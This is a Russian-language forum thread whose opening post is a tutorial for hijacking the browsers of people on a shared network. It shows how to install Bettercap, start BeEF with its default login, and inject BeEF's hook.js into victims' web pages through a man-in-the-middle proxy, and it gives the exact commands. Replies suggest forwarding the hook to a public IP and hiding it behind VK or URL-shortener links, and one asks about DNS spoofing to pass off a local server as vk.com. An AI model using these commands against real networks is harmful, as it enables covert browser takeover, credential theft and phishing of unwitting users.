НАЧАЛО Для начало нам нужно установить Bettercap, пишем следующие команды : apt-get update apt-get dist-upgrade apt-get install bettercap Code apt-get update apt-get dist-upgrade apt-get install bettercap НАСТРАИВАЕМ После этого запускаем BeEF Xss Framework Дальше у нас откроется вот такой терминал: Тыкаем на ссылку под названием "UI URL" и логинимся. Пароль и логин: beef. Теперь нам надо узнать наш внутренний IP. Пишим ifconfig. В моем случае у меня IP 192.168.100.4. Для чего мы узнавали наш IP? Для того чтобы мы настроили ссылку на наш HOOK. Как видите на терминале с BeEF показан пример ссылки с HOOK и вместо <IP> подставляем наш IP. HOOK - это JS скрипт дающий нам доступ к устройству. Ну а теперь когда мы поняли что такое HOOK, давайте заражать устройства. В этом нам пожет Bettercap. Запускаем его вот с такими параметрами: bettercap --proxy --proxy-module injectjs --js-url "192.168.100.4:3000/hook.js" Code bettercap --proxy --proxy-module injectjs --js-url "192.168.100.4:3000/hook.js" Обьясню какие параметры за что отвечают: Отвечает за использование ****** для обхода SSL сертификата. --proxy Code --proxy Этот модуль отвечает за инджект скрипта в жертву. --proxy-module injectjs Code --proxy-module injectjs А это уже ссылка на наш HOOK. --js-url "192.168.100.4:3000/hook.js Code --js-url "192.168.100.4:3000/hook.js ЗАХВАТ ЖЕРТВ Теперь мы ждем, когда жертва(ы) зайдут на какю-нибудь страницу. !!! ПРОШУ ЗАМЕТИТЬ, ЕСЛИ ЖЕРТВА ЗАКРОЕТ СТРАНИЦУ СО СКРИПТОМ МЫ ПОТЕРЯЕМ ДОСТУП, НО ЕСЛИ ОНА ОТКРОЕТ ДРУГУЮ ТО СКРИПТ ВЕРНЕТСЯ !!! Переходим на панель BeEF. Ну а дальше сами делаем, если хотите могу запилить тему по этой программе. Но это в другой раз! А на этом я прощаюсь с вами был WATCHIZ. #моястатья
Вот мне все любопытно, проканает ли если пробросить нужную переадресацию в роутере. Что бы скрипт ломился на WAN а роутер уже давал на внутренний IP:PORT
Могу конечно ошибаться, но в моей голове это выглядит так: К примеру имеем внешний белый IP 1.2.3.4 и серый 192.168.0.1 Как видно, указано в статье что используется порт 3000, следовательно в роутере прописываем маршрут соединений с 1.2.3.4:3000 go to > 192.168.0.1:3000 В случае если бы такой маршрут прокатил бы, то мы имеем возможность в строке (из кода автора поста) [B]192.168.100.4:3000/ hook.js[/B] Code [B]192.168.100.4:3000/ hook.js[/B] заменить свой внешник 1.2.3.4:3000/ hook.js, в свою очередь сам маршрутизатор должен адресовать соединение на тот же 192.168.0.1:3000. В таком исполнении можно уже подсовывать людям чуть ли не ВК сократив все на vk .cc или goo. gl По логике должно сработать собственно, но к сожалению не пробовал и эта мысль родилась буквально за 2 минуты, прошу не ругать сильно. Если я что-то не учел (а скорее всего так и есть, то просьба указать на ошибки.:wink3:
Да и я впрочем то тоже не уверен. Но эта так скажем теория не лишена логики. Что-ж. Постараюсь проверить как только с работой разгребусь. Отпишусь если что.
с HTTPS еще более сомнительный вопрос ибо в связке kali>роутер>жертва не думаю что уместен будет сам сертификат.
Cкиньте кто то FAQ к bettercap а то я не понимаю где новая инфа, жму в kali linux bettercap --help фигня
Ребят, вот тоже стало интересно. У меня есть доступ к роутеру и есть ли возможность подмены DNS так, чтобы мой localhost, отображался как vk.com?